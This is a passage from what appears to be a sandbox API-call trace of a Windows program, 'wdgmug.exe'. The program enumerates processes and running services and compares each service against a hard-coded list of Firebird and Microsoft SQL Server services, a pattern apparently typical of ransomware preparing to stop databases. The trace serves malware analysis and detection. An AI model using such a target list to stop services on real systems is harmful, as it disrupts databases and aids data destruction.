th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0299.678] lstrlenW (lpString="wdgmug.exe") returned 10 [0299.678] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0299.679] lstrlenW (lpString="cmd.exe") returned 7 [0299.679] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0299.679] lstrlenW (lpString="conhost.exe") returned 11 [0299.679] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0299.680] lstrlenW (lpString="mode.com") returned 8 [0299.680] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 0 [0299.680] CloseHandle (hObject=0x47c) returned 1 [0299.680] Sleep (dwMilliseconds=0x1f4) [0300.272] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x401a080 [0300.272] EnumServicesStatusExW (in: hSCManager=0x401a080, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0300.273] GetLastError () returned 0xea [0300.273] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1bc4) returned 0x4137f20 [0300.273] EnumServicesStatusExW (in: hSCManager=0x401a080, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4137f20, cbBufSize=0x1bc4, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4137f20, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0300.274] CloseServiceHandle (hSCObject=0x401a080) returned 1 [0300.275] lstrlenW (lpString="AppXSvc") returned 7 [0300.275] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0300.275] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0300.275] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0300.275] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0300.275] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0300.275] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0300.275] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0300.275] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0300.275] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0300.275] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0300.275] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0300.276] lstrlenW (lpString="Audiosrv") returned 8 [0300.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0300.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0300.276] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0300.276] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0300.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0300.276] lstrlenW (lpString="BFE") returned 3 [0300.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0300.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0300.276] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0300.276] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0300.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0300.276] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0300.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0300.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0300.276] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0300.276] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0300.276] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0300.276] lstrlenW (lpString="CDPSvc") returned 6 [0300.276] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0300.276] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0300.276] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0300.277] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0300.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0300.277] lstrlenW (lpString="ClickToRunSvc") returned 13 [0300.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0300.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0300.277] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0300.277] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0300.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0300.277] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0300.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0300.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0300.277] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0300.277] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0300.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0300.277] lstrlenW (lpString="CryptSvc") returned 8 [0300.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0300.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0300.277] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0300.277] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0300.277] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0300.277] lstrlenW (lpString="DcomLaunch") returned 10 [0300.277] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0300.277] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0300.278] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0300.278] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0300.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0300.278] lstrlenW (lpString="DeviceAssociationService") returned 24 [0300.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0300.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0300.278] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0300.278] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0300.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0300.278] lstrlenW (lpString="Dhcp") returned 4 [0300.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0300.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0300.278] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0300.278] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0300.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0300.278] lstrlenW (lpString="Dnscache") returned 8 [0300.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0300.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0300.278] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0300.278] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0300.278] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0300.278] lstrlenW (lpString="DPS") returned 3 [0300.278] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0300.278] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0300.278] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0300.279] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0300.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0300.279] lstrlenW (lpString="DusmSvc") returned 7 [0300.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0300.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0300.279] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0300.279] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0300.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0300.279] lstrlenW (lpString="EventLog") returned 8 [0300.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0300.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0300.279] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0300.279] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0300.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0300.279] lstrlenW (lpString="EventSystem") returned 11 [0300.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0300.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0300.279] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0300.279] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0300.279] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0300.279] lstrlenW (lpString="FontCache") returned 9 [0300.279] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0300.279] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0300.279] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0300.279] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0300.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0300.280] lstrlenW (lpString="gpsvc") returned 5 [0300.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0300.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0300.280] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0300.280] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0300.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0300.280] lstrlenW (lpString="iphlpsvc") returned 8 [0300.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0300.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0300.280] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0300.280] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0300.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0300.280] lstrlenW (lpString="KeyIso") returned 6 [0300.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0300.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0300.280] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0300.280] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0300.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0300.280] lstrlenW (lpString="LanmanServer") returned 12 [0300.280] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0300.280] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0300.280] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0300.280] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0300.280] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0300.280] lstrlenW (lpString="LanmanWorkstation") returned 17 [0300.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0300.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0300.281] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0300.281] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0300.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0300.281] lstrlenW (lpString="lfsvc") returned 5 [0300.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0300.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0300.281] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0300.281] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0300.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0300.281] lstrlenW (lpString="lmhosts") returned 7 [0300.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0300.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0300.281] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0300.281] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0300.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0300.281] lstrlenW (lpString="LSM") returned 3 [0300.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0300.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0300.281] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0300.281] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0300.281] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0300.281] lstrlenW (lpString="MpsSvc") returned 6 [0300.281] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0300.281] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0300.282] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0300.282] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0300.282] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0300.282] lstrlenW (lpString="NcbService") returned 10 [0300.282] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0300.282] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0300.282] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0300.282] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0300.282] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0300.282] lstrlenW (lpString="netprofm") returned 8 [0300.282] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0300.282] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0300.282] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0300.282] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0300.282] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0300.282] lstrlenW (lpString="NgcSvc") returned 6 [0300.282] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0300.282] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0300.282] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0300.282] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0300.282] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0300.282] lstrlenW (lpString="NlaSvc") returned 6 [0300.282] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0300.282] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0300.283] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0300.283] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0300.283] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0300.283] lstrlenW (lpString="nsi") returned 3 [0300.283] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0300.283] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0300.283] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0300.283] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0300.283] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0300.283] lstrlenW (lpString="PcaSvc") returned 6 [0300.283] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0300.283] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0300.283] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0300.283] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0300.283] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0300.283] lstrlenW (lpString="PlugPlay") returned 8 [0300.283] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0300.283] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0300.283] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0300.283] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0300.283] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0300.283] lstrlenW (lpString="Power") returned 5 [0300.283] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0300.283] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0300.283] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0300.283] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0300.284] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0300.284] lstrlenW (lpString="ProfSvc") returned 7 [0300.284] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0300.284] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0300.284] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0300.284] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0300.284] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0300.284] lstrlenW (lpString="RpcEptMapper") returned 12 [0300.284] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0300.284] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0300.284] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0300.284] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0300.284] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0300.284] lstrlenW (lpString="RpcSs") returned 5 [0300.284] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0300.284] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0300.284] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0300.284] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0300.284] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0300.284] lstrlenW (lpString="SamSs") returned 5 [0300.284] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0300.284] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0300.284] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0300.284] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0300.284] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0300.285] lstrlenW (lpString="Schedule") returned 8 [0300.285] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0300.285] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0300.285] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0300.285] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0300.285] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0300.285] lstrlenW (lpString="SecurityHealthService") returned 21 [0300.285] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0300.285] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0300.285] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0300.285] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0300.285] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0300.285] lstrlenW (lpString="SENS") returned 4 [0300.285] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0300.285] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0300.285] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0300.285] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0300.285] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0300.285] lstrlenW (lpString="ShellHWDetection") returned 16 [0300.285] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0300.285] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0300.285] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0300.285] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0300.285] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0300.285] lstrlenW (lpString="Spooler") returned 7 [0300.285] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0300.423] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0300.423] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0300.423] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0300.423] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0300.423] lstrlenW (lpString="StateRepository") returned 15 [0300.423] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0300.423] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0300.423] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0300.424] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0300.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0300.424] lstrlenW (lpString="SysMain") returned 7 [0300.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0300.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0300.424] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0300.424] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0300.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0300.424] lstrlenW (lpString="SystemEventsBroker") returned 18 [0300.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0300.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0300.424] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0300.424] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0300.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0300.424] lstrlenW (lpString="Themes") returned 6 [0300.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0300.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0300.424] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0300.424] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0300.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0300.424] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0300.424] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0300.424] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0300.424] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0300.424] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0300.424] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0300.425] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0300.425] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0300.425] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0300.425] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0300.425] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 